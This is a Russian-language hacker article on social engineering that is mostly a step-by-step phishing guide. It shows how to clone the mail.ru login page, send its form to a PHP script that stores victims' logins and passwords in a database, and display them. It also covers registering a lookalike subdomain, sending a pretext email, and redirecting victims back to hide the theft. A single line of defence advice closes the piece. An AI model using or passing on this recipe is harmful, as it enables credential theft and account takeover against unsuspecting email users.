Название : Социальная инженерия(СИ)
Оценка: 7 баллов
Краткий обзор :
Существует много статей на эту ,ставшую в последнее время очень модной,тему.Что же представляет из себя социальная инженерия?К примеру Вася знает пароль к почте Ани,а Саша хочет этот пароль узнать.Но не может же он подойти к Ане и спросить ее о пароле..может ему влом,а может просто боится лишнего средство освещения под глазом,поэтому он подходит к Васе(попутно брату Ани) дает ему конфетку(или,что еще хуже,пи#дюлей) и узнает пароль!Вот и все!
Применение приема СИ:
СИ в мире web применяется очень часто,это обусловлено крайне низким уровнем обитающего тут населения,а когда это население доверчиво,результат может стать крайне отрицательным.Для них.Опишу случай сверху без применения спецоперации "Конфетка"("Пи#дюли").
Предположим,что у Ани следующая почта [email protected]Регистрируем на бесплатном провайдере pupkin.ru следующий домен : servicemail.pupkin.ru.Затем заходим на mail.ru сохраняем страницу на компьютер под названием index.html,и немного отредактируем этот файл.Action формы отправки логина и пароля меняем на cageperexvat.php.Затем создаем скрипт под названием cageperexvat.php следующего содержания
<?php
//в зависимости от свойтства method формы в коде будет или POST или GET
$login = $_POST['login'];
$password = $_POST['password'];
$domain = $_POST['domain'];
//код подключения к базе данных,предоставляемой
// провайдером,создание таблицы с 3 полями
//и последующим занесением туда переменных $login,$password,$domain
?>
Затем создаем файл show.php,делающий выборку из БД и отображающей ее в браузере,попутно заливаем все эти 3 файла на servicemail.pupkin.ru
Остается последнее.Регистрируем почту с замысловато-умным названием [email protected],
отправляем на почту жертвы письмо,что,мол,произошла утечка транзакций из экспоненциальных структур полиморфных концепций нашей БД,просим,гражданочка,пройти по данному адресу servicemail.pupkin.ru и повторить залогинивание для подтверждения ваших прав
Жертва по инерции заходит регистрируется и заного появляется уже на mail.ru(для этого после успешной записи в БД сделайте редирект на mail.ru)
Ву а ля!Пароли у вас в БД!Смотрите на здоровье.
Меры защиты:Никогда не ходите по подозрительным ссылкам,просящих вас зарегистрироваться,и обещающим вам ванильные небеса,также всегда смотрите на URL,по которым вас ведут,в общем,,граждане будьте бдительны!
to be continued…
